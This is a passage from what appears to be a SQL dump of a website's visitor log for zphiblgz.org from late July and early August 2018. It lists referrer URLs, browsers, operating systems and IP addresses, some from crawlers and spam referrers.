ZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZkNsV3VTOURuckpIenE5SzBnMmVoX2lYbDdiZDJyZkVzSUNxNzlfdUhpUSws&sign=43c86fd146330ffc71d22432f0c6a372&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.152','000',2,0),(34078,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.TpSmr9xBKYIAhND9Zm4PbqeSQ0Wl2GWw38elRMEMvKM.ca13cea9c7fb0e4910753ca7129143266569d4cd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZS0tWTZMN21kdlFfN2RqVUI3bFZ4M09UaHRnV1FyMVJKV1R6bnpTeVVzQSws&sign=7bd3f426bb795f94bce6927ad4f759a6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.16.245','000',2,0),(34079,'2018-07-31','https://zphiblgz.org','MSIE','Windows','8.0','','18.237.137.157','000',1,0),(34080,'2018-07-31','https://zphiblgz.org','MSIE','Windows','8.0','','54.68.14.25','000',1,0),(34081,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.g0XK2oqA9nZIBsUEGwuYyebtrCtQ9Ou0C2Ivp-ZGMGE.0f54cded43ec008009af372ba6a89bb1bc5d722a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042V1FxbVA2bERtRmQ2cThsUEU3RXRHSXV6SW1uMWxZMkZBS3Z3azc1ZHJkUSws&sign=115cc38e29e2de333cc4a98355421a70&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.240.99','000',2,0),(34082,'2018-07-31','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.41p8M0jodngLMH7x5cdGbhmpcCFmXsTwEybX73Pi8S8.ccf2d6a71a7a67000085b1ba4d7672274a1dc87c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041SUdZRGhFSGN2Y094bEZQSXRleXZHbFhQeEQ3aG9XLUpxbFNlSzZfYTk4USws&sign=57c9efd42316d86c11ad19060238ab6d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.98','000',2,0),(34083,'2018-07-31','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.Ihr_1MaOt1HXC0RelBUzex4VH5I65mTzglYNWmE7PW8.435ac05107c4e7e284e3dfc30a2a0bfe4e01ede9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041LTJ4ZUVZOHBod3REaGdKR0lPdFRDZHZTS1pqU2R2V0IwV2hEeHpRejFOUSws&sign=3ddc48f22d57230044fc800500b730f6&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.14','000',2,0),(34084,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.y_F1wmjRUNWvw7tHeMbZHBsnZLS2YeVrcQjVP86Iclg.f49f22263ebcf55e63efdc1ed96bebd0c4bfb3e7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040T21IdnRXZktCcXpJcTZndVVlTlRFS2VyTjEtV3pMdzBoV0dTa0xEalBLUSws&sign=8c7e3ebc9ad1a2eaae1f9d340c389b8a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(34085,'2018-07-31','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.164','000',2,0),(34086,'2018-07-31','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(34087,'2018-07-31','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1865.cScl2G3xhG65nDmqAsyYHLjI5wdDS2irypZ-eGa9jLw.128e91d04947793621072c62945542efc3a7b037&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QlBkUkRNR1hOU0FDYlJlUHc0RlctZmwtSWM2Nkt0ajRZYlFFYlEtSDJ0Zyws&sign=dad4009149074d8c7ef845d15f356f3c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.232.176','000',2,0),(34088,'2018-07-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','173.244.36.6','000',1,0),(34089,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','Firefox','Linux','52.0','','196.52.84.40','000',2,0),(34090,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','AppleWebKit','Windows','534','','87.112.161.165','000',2,0),(34091,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','11.0','','139.59.4.194','000',2,0),(34092,'2018-07-31','https://zphiblgz.org/cache/v12/get_started','SamsungBrowser','Android','5.2','','185.158.105.80','000',2,0),(34093,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','11.0','','87.112.161.165','000',1,0),(34094,'2018-07-31','http://zphiblgz.org/cache/v12/get_started','AppleWebKit','Windows','534','','23.129.64.105','000',1,0),(34095,'2018-07-31','https://zphiblgz.org','Edge','Windows','15.15063','','162.247.74.204','000',2,0),(34096,'2018-07-31','https://zphiblgz.org','AppleWebKit','Linux','24.15.9','','34.214.109.24','000',1,0),(34097,'2018-07-31','https://zphiblgz.org','Safari','Windows','20180731','','34.214.109.24','000',2,0),(34098,'2018-07-31','http://zphiblgz.org/','Firefox','Windows','53.0','','95.37.198.249','000',3,0),(34099,'2018-07-31','https://zphiblgz.org','Firefox','Windows','50.0','','188.120.40.153','000',1,0),(34100,'2018-07-31','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(34101,'2018-07-31','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(34102,'2018-07-31','https://zphiblgz.org','Firefox','Windows','61.0','','71.244.225.207','000',3,0),(34103,'2018-07-31','https://www.google.com/','Chrome','Windows','67.0.3396.99','','108.209.67.14','000',4,0),(34104,'2018-07-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.115','000',2,0),(34105,'2018-07-31','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(34106,'2018-07-31','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','69.175.97.172','000',1,0),(34107,'2018-07-31','https://www.zphiblgz.org/','Chrome','Windows','66.0.3359.117','','69.175.97.170','000',1,0),(34108,'2018-07-31','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.212.78.109','000',5,0),(34109,'2018-07-31','http://zphiblgz.org/','Safari','Windows','4.6.1','','212.83.165.19','000',2,0),(34110,'2018-07-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(34111,'2018-07-31','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','162.247.74.204','000',1,0),(34112,'2018-07-31','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',2,0),(34113,'2018-07-31','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(34114,'2018-07-31','https://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.93','000',1,0),(34115,'2018-07-31','https://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.81','000',1,0),(34116,'2018-07-31','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(34117,'2018-07-31','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(34118,'2018-07-31','https://zphiblgz.org','Firefox','Linux','42.0','','195.245.113.127','000',2,0),(34119,'2018-07-31','https://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.82','000',1,0),(34120,'2018-07-31','http://zphiblgz.org/ts_teams/gloria-sanders/','MSIE','Windows','9.0','','131.253.25.85','000',1,0),(34121,'2018-07-31','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','51.15.81.222','000',1,0),(34122,'2018-07-31','https://zphiblgz.org','AppleWebKit','Macintosh','605.1.15','','173.69.169.221','000',1,0),(34123,'2018-07-31','https://zphiblgz.org','Safari','iPhone','11.0','','173.69.169.221','000',1,0),(34124,'2018-07-31','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',2,0),(34125,'2018-07-31','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(34126,'2018-07-31','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','78.24.218.148','000',2,0),(34127,'2018-07-31','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.234.14','000',2,0),(34128,'2018-07-31','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(34129,'2018-08-01','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',2,0),(34130,'2018-08-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(34131,'2018-08-01','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.20.103.246','000',1,0),(34132,'2018-08-01','https://zphiblgz.org','Firefox','Windows','40.1','','182.185.130.86','000',2,0),(34133,'2018-08-01','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34134,'2018-08-01','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(34135,'2018-08-01','https://zphiblgz.org','MSIE','Windows','11.0','','52.173.241.248','000',1,0),(34136,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','109.201.133.236','000',2,0),(34137,'2018-08-01','https://zphiblgz.org','MSIE','Unknown','7.0','','35.155.252.208','000',1,0),(34138,'2018-08-01','https://zphiblgz.org','Chrome','Windows','29.10.4','','35.155.252.208','000',2,0),(34139,'2018-08-01','http://site.ru','Chrome','Windows','5.0.375.99','','173.212.205.76','000',1,0),(34140,'2018-08-01','https://www.google.com/','Chrome','Windows','67.0.3396.99','','208.49.194.164','000',11,0),(34141,'2018-08-01','http://www.zphibmaryland.org/chapters/','Chrome','Windows','67.0.3396.99','','207.76.142.9','000',11,0),(34142,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.138','000',1,0),(34143,'2018-08-01','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.205','000',2,0),(34144,'2018-08-01','https://zphiblgz.org','MSIE','Windows','8.0','','70.42.131.170','000',2,0),(34145,'2018-08-01','https://zphiblgz.org','Safari','Macintosh','11.1.1','','71.179.15.195','000',1,0),(34146,'2018-08-01','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.29','000',1,0),(34147,'2018-08-01','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(34148,'2018-08-01','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(34149,'2018-08-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',2,0),(34150,'2018-08-01','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(34151,'2018-08-01','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','214.36.0.135','000',1,0),(34152,'2018-08-01','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','214.36.6.52','000',2,0),(34153,'2018-08-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(34154,'2018-08-01','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(34155,'2018-08-01','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',2,0),(34156,'2018-08-01','https://russian-translator.com/website-translation-services','MSIE','Unknown','6.0','','5.248.253.117','000',3,0),(34157,'2018-08-01','https://zphiblgz.org','MSIE','Windows','11.0','','94.130.140.243','000',1,0),(34158,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.79.93.26','000',1,0),(34159,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','198.57.247.133','000',1,0),(34160,'2018-08-01','https://www.google.com/','Safari','iPhone','11.0','','73.201.134.68','000',7,0),(34161,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.148','000',1,0),(34162,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.83.188.121','000',1,0),(34163,'2018-08-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','149.255.58.12','000',1,0),(34164,'2018-08-01','https://zphiblgz.org','Chrome','Linux','66.0.3359.117','','172.84.100.254','000',2,0),(34165,'2018-08-01','https://zphiblgz.org','Chrome','Linux','66.0.3359.117','','80.86.28.236','000',2,0),(34166,'2018-08-01','https://zphiblgz.org','Firefox','Windows','40.1','','94.62.149.71','000',2,0),(34167,'2018-08-01','https://www.google.com/','Chrome','Windows','68.0.3440.84','','165.225.34.196','000',4,0),(34168,'2018-08-01','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','178.137.88.27','000',2,0),(34169,'2018-08-01','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.107','000',1,0),(34170,'2018-08-01','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.125.190','000',2,0),(34171,'2018-08-01','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(34172,'2018-08-01','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(34173,'2018-08-02','https://zphiblgz.org','Firefox','Windows','40.1','','203.192.225.67','000',2,0),(34174,'2018-08-02','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(34175,'2018-08-02','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(34176,'2018-08-02','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.5','000',1,0),(34177,'2018-08-02','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(34178,'2018-08-02','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.27','000',1,0),(34179,'2018-08-02','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(34180,'2018-08-02','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',2,0),(34181,'2018-08-02','zphiblgz.org','Chrome','Windows','46.0.2754.75','','5.135.138.188','000',2,0),(34182,'2018-08-02','http://zphiblgz.org/','Opera Next','Windows','55.0.2962.0','','31.184.238.129','000',3,0),(34183,'2018-08-02','http://zphiblgz.org/','Opera','Windows','12.17','','31.184.238.129','000',1,0),(34184,'2018-08-02','https://zphiblgz.org','Chrome','Macintosh','67.0.3396.79','','31.184.238.129','000',2,0),(34185,'2018-08-02','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(34186,'2018-08-02','https://zphiblgz.org','Firefox','Windows','40.1','','115.167.113.41','000',2,0),(34187,'2018-08-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.60.100.243','000',2,0),(34188,'2018-08-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','51.68.124.84','000',2,0),(34189,'2018-08-02','https://zphiblgz.org','Firefox','Windows','1.6.4','','34.214.109.24','000',1,0),(34190,'2018-08-02','https://zphiblgz.org','Chrome','Windows','20180802','','34.214.109.24','000',2,0),(34191,'2018-08-02','https://zphiblgz.org','Firefox','Windows','20180802','','34.214.109.24','000',2,0),(34192,'2018-08-02','https://zphiblgz.org','Chrome','Windows','13.14','','34.214.109.24','000',2,0),(34193,'2018-08-02','https://www.google.com/','Chrome','Windows','67.0.3396.62','','168.9.213.18','000',2,0),(34194,'2018-08-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(34195,'2018-08-02','https://zphiblgz.org','Firefox','Windows','40.1','','156.212.225.185','000',2,0),(34196,'2018-08-02','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.115','000',1,0),(34197,'2018-08-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.56','000',5,0),(34198,'2018-08-02','https://zphiblgz.org','Firefox','Windows','40.1','','170.84.54.35','000',2,0),(34199,'2018-08-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(34200,'2018-08-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(34201,'2018-08-02','http://site.ru','Chrome','Windows','5.0.375.99','','68.171.213.154','000',1,0),(34202,'2018-08-02','http://m.facebook.com/','Chrome','Android','67.0.3396.87','','99.203.16.126','000',3,0),(34203,'2018-08-02','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','18.237.200.158','000',2,0),(34204,'2018-08-02','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(34205,'2018-08-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(34206,'2018-08-02','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(34207,'2018-08-02','https://russian-translator.com/localization-services','MSIE','Windows','6.0','','5.248.253.117','000',3,0),(34208,'2018-08-02','https://zphiblgz.org','MSIE','Windows','8.0','','52.42.174.215','000',1,0),(34209,'2018-08-02','http://zphiblgz.org/','Chrome','Windows','30.0.1599.13014','','193.169.252.17','000',3,0),(34210,'2018-08-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(34211,'2018-08-02','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(34212,'2018-08-02','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.173','000',2,0),(34213,'2018-08-02','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.149','000',1,0),(34214,'2018-08-02','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(34215,'2018-08-02','https://zphiblgz.org','Firefox','Windows','3.0.1','','41.185.8.210','000',4,0),(34216,'2018-08-02','https://www.google.com/','Chrome','Macintosh','68.0.3440.84','','50.90.112.216','000',2,0),(34217,'2018-08-02','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(34218,'2018-08-02','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.68.238','000',2,0),(34219,'2018-08-02','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(34220,'2018-08-03','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','71.6.165.200','000',5,0),(34221,'2018-08-03','https://zphiblgz.org','Chrome','Macintosh','66.0.3359.117','','31.184.238.129','000',2,0),(34222,'2018-08-03','http://zphiblgz.org/','MSIE','Windows','6.0','','36.65.114.40','000',1,0),(34223,'2018-08-03','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(34224,'2018-08-03','https://zphiblgz.org','Firefox','Windows','50.0','','178.170.156.147','000',1,0),(34225,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','217.61.0.54','000',1,0),(34226,'2018-08-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(34227,'2018-08-03','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(34228,'2018-08-03','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(34229,'2018-08-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34230,'2018-08-03','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(34231,'2018-08-03','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(34232,'2018-08-03','zphiblgz.org/groupes/','Firefox','Windows','38.0','','81.171.18.36','000',1,0),(34233,'2018-08-03','https://zphiblgz.org','MSIE','Windows','8.0','','35.155.252.208','000',1,0),(34234,'2018-08-03','https://zphiblgz.org','MSIE','Windows','7.0','','35.155.252.208','000',2,0),(34235,'2018-08-03','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(34236,'2018-08-03','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(34237,'2018-08-03','https://zphiblgz.org','Firefox','Windows','40.1','','188.79.249.190','000',2,0),(34238,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.79','000',1,0),(34239,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.50','000',1,0),(34240,'2018-08-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(34241,'2018-08-03','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(34242,'2018-08-03','https://zphiblgz.org','Chrome','Macintosh','53.0.2838.55','','107.175.202.125','000',1,0),(34243,'2018-08-03','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','69.140.70.45','000',1,0),(34244,'2018-08-03','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(34245,'2018-08-03','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(34246,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.10','000',1,0),(34247,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.8','000',1,0),(34248,'2018-08-03','http://site.ru','Chrome','Windows','5.0.375.99','','81.88.49.4','000',1,0),(34249,'2018-08-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(34250,'2018-08-03','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(34251,'2018-08-03','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(34252,'2018-08-03','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.253.127','000',1,0),(34253,'2018-08-03','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.193','000',2,0),(34254,'2018-08-03','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.153','000',1,0),(34255,'2018-08-03','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.189.141','000',1,0),(34256,'2018-08-03','https://www.google.com/','Chrome','Android','67.0.3396.87','','172.58.168.140','000',3,0),(34257,'2018-08-03','https://zphiblgz.org','Firefox','Windows','40.1','','179.127.36.82','000',2,0),(34258,'2018-08-03','http://zphiblgz.org/buy-viagra-fsdfhjk','MSIE','Windows','6.0','','112.201.88.244','000',1,0),(34259,'2018-08-03','https://zphiblgz.org','Python-urllib','Unknown','2.7','','185.220.101.0','000',1,0),(34260,'2018-08-03','https://zphiblgz.org','Python-urllib','Unknown','2.7','','171.25.193.25','000',1,0),(34261,'2018-08-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','5.135.173.237','000',2,0),(34262,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(34263,'2018-08-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.171.225','000',4,0),(34264,'2018-08-04','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.131.56.97','000',1,0),(34265,'2018-08-04','http://zphiblgz.org/','Safari','Macintosh','10.1','','163.172.4.153','000',1,0),(34266,'2018-08-04','https://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','163.172.4.153','000',1,0),(34267,'2018-08-04','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.194.75','000',1,0),(34268,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(34269,'2018-08-04','https://www.google.com/','Safari','iPhone','11.0','','172.56.2.92','000',1,0),(34270,'2018-08-04','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(34271,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.31','000',1,0),(34272,'2018-08-04','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',2,0),(34273,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(34274,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(34275,'2018-08-04','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(34276,'2018-08-04','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',2,0),(34277,'2018-08-04','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.128.51.171','000',3,0),(34278,'2018-08-04','https://zphiblgz.org','Firefox','Windows','1.6.4','','34.214.109.24','000',1,0),(34279,'2018-08-04','https://zphiblgz.org','Chrome','Windows','20180804','','34.214.109.24','000',2,0),(34280,'2018-08-04','https://zphiblgz.org','MSIE','Windows','11.0','','78.46.94.83','000',2,0),(34281,'2018-08-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.129','000',2,0),(34282,'2018-08-04','http://zphiblgz.org/','Chrome','Windows','67.0.3396.79','','31.207.3.96','000',2,0),(34283,'2018-08-04','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(34284,'2018-08-04','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(34285,'2018-08-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',23,0),(34286,'2018-08-04','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',5,0),(34287,'2018-08-04','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(34288,'2018-08-04','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(34289,'2018-08-04','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','71.6.165.200','000',1,0),(34290,'2018-08-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(34291,'2018-08-04','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',2,0),(34292,'2018-08-04','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','71.163.91.69','000',1,0),(34293,'2018-08-04','https://zphiblgz.org','Firefox','Windows','32.0','','193.104.35.105','000',1,0),(34294,'2018-08-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(34295,'2018-08-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(34296,'2018-08-04','https://zphiblgz.org','Firefox','Windows','40.1','','142.160.43.251','000',2,0),(34297,'2018-08-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(34298,'2018-08-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(34299,'2018-08-04','https://www.google.com/','Safari','iPhone','11.0','','99.75.74.101','000',2,0),(34300,'2018-08-04','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(34301,'2018-08-04','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.31','000',1,0),(34302,'2018-08-04','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.137.218','000',2,0),(34303,'2018-08-04','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.73.15','000',3,0),(34304,'2018-08-05','https://zphiblgz.org','Firefox','Windows','57.0','','85.10.51.15','000',2,0),(34305,'2018-08-05','https://zphiblgz.org/','Firefox','Windows','57.0','','81.171.71.127','000',3,0),(34306,'2018-08-05','https://zphiblgz.org','Firefox','Windows','40.1','','73.152.161.247','000',2,0),(34307,'2018-08-05','http://site.ru','Chrome','Windows','5.0.375.99','','5.9.10.150','000',2,0),(34308,'2018-08-05','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',2,0),(34309,'2018-08-05','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(34310,'2018-08-05','https://zphiblgz.org','MS